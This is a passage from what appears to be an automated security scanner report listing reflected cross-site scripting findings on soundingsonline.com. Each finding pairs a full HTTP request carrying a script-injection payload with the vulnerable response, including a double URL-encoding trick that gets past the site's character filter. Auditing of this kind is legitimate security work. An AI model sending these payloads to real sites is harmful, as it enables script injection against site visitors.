Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66,
   "thumbnail_margin":597436;alert(1)//8a6cc5501ee,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,
   "actual_animation":false
...[SNIP]...

4.1429. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [thumbnail_width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the thumbnail_width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 232a2%3balert(1)//686be8d0403 was submitted in the thumbnail_width parameter. This input was echoed as 232a2;alert(1)//686be8d0403 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /modules/mod_gk_news_image_1/js/importer.php?mid=newsimage1&animation_slide_speed=500&animation_interval=9000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=ffffff&text_block_opacity=0&thumbnail_width=66232a2%3balert(1)//686be8d0403&thumbnail_margin=5&thumbnail_border=1&thumbnail_border_color=a81c21&thumbnail_border_color_inactive=ffffff&interface_x=-20&interface_y=0&clickable_slides=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/javascript

try {$Gavick;}catch(e){$Gavick = {};};

$Gavick["gk_news_image_1-newsimage1"] = {
   "anim_speed":500,
   "anim_interval":9000,
   "autoanim":1,
   "anim_type":0,
   "anim_type_t":0,
   "bgcolor":"#ffffff",
   "opacity":0,
   "thumbnail_width":66232a2;alert(1)//686be8d0403,
   "thumbnail_margin":5,
   "thumbnail_border":1,
   "thumbnail_border_color":"#a81c21",
   "thumbnail_border_color_inactive":"#ffffff",
   "interface_x":-20,
   "interface_y":0,
   "clickable_slides":1,

...[SNIP]...

4.1430. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [img_width parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the img_width request parameter is copied into the HTML document as plain text between tags. The payload e4ade<script>alert(1)</script>e6a9f213599 was submitted in the img_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=news_home_waters&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195pxe4ade<script>alert(1)</script>e6a9f213599&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

#news_home_waters a.readon_class{
   float: left;}

#news_home_waters h4.gk_news_show_news_header {
   margin: 0 0 8px;
   padding:0;
   text-align: left;}

#news_home_waters img.gk_news_show_news_image {
   display: block;float: left;}

#news_home_waters img.gk_news_show_news_image_static {
   display: block;float: left;width: 195pxe4ade<script>alert(1)</script>e6a9f213599;}

#news_home_waters a.gk_news_show_news_readmore {
}

#news_home_waters a.gk_news_show_news_readmore_inline {
   margin-left: 10px;
}

#news_home_waters p.gk_news_show_news_text {
   margin-top
...[SNIP]...

4.1431. http://www.soundingsonline.com/modules/mod_news_show_gk3/style/style.php [modid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/modules/mod_news_show_gk3/style/style.php

Issue detail

The value of the modid request parameter is copied into the HTML document as plain text between tags. The payload 75723<script>alert(1)</script>13bc00b91d6 was submitted in the modid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_news_show_gk3/style/style.php?modid=news_home_waters75723<script>alert(1)</script>13bc00b91d6&news_content_header_pos=1&news_content_image_pos=1&img_height=0&img_width=195px&news_content_info_pos=1&news_content_readmore_pos=1&news_content_text_pos=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.soundingsonline.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css

#news_home_waters75723<script>alert(1)</script>13bc00b91d6 a.readon_class{
float: left;}

#news_home_waters75723<script>alert(1)</script>13bc00b91d6 h4.gk_news_show_news_header {
margin: 0 0 8
...[SNIP]...

4.1432. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/digital-publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3faa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef66606158cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3faa"><script>alert(1)</script>f66606158cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /more/digital-publications?c3faa%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef66606158cb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:38:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/digital-publications?c3faa"><script>alert(1)</script>f66606158cb=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1433. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/more/the-masters-series

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbd9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b8b831275 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbd9c"><script>alert(1)</script>72b8b831275 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /more/the-masters-series?cbd9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e72b8b831275=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:37:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:37:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/more/the-masters-series?cbd9c"><script>alert(1)</script>72b8b831275=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1434. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23200%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22acdd97a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 23200"><script>alert(1)</script>22acdd97a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news?23200%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e22acdd97a8=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news?23200"><script>alert(1)</script>22acdd97a8=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1435. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd689%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3604a112d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cd689"><script>alert(1)</script>3604a112d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/coastwise?cd689%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3604a112d5=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/coastwise?cd689"><script>alert(1)</script>3604a112d5=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1436. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d1219e4f8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f10d"><script>alert(1)</script>5d1219e4f8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/dispatches?1f10d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d1219e4f8e=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/dispatches?1f10d"><script>alert(1)</script>5d1219e4f8e=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1437. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc440%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4fc62980f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc440"><script>alert(1)</script>d4fc62980f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/home-waters?fc440%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed4fc62980f3=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/home-waters?fc440"><script>alert(1)</script>d4fc62980f3=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1438. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e5db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecfbc5b7ba90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e5db"><script>alert(1)</script>cfbc5b7ba90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/mishaps-a-rescues?6e5db%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecfbc5b7ba90=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:14 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/mishaps-a-rescues?6e5db"><script>alert(1)</script>cfbc5b7ba90=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1439. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e677f804dff5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bab04"><script>alert(1)</script>677f804dff5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/sailing?bab04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e677f804dff5=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:44 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/sailing?bab04"><script>alert(1)</script>677f804dff5=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1440. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e3aae6e23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f32ed"><script>alert(1)</script>a3e3aae6e23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /news/todays-top-stories?f32ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3e3aae6e23=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/news/todays-top-stories?f32ed"><script>alert(1)</script>a3e3aae6e23=1&format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1441. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db0b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e03dbd69e9aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9db0b"><script>alert(1)</script>03dbd69e9aa in the application's response.

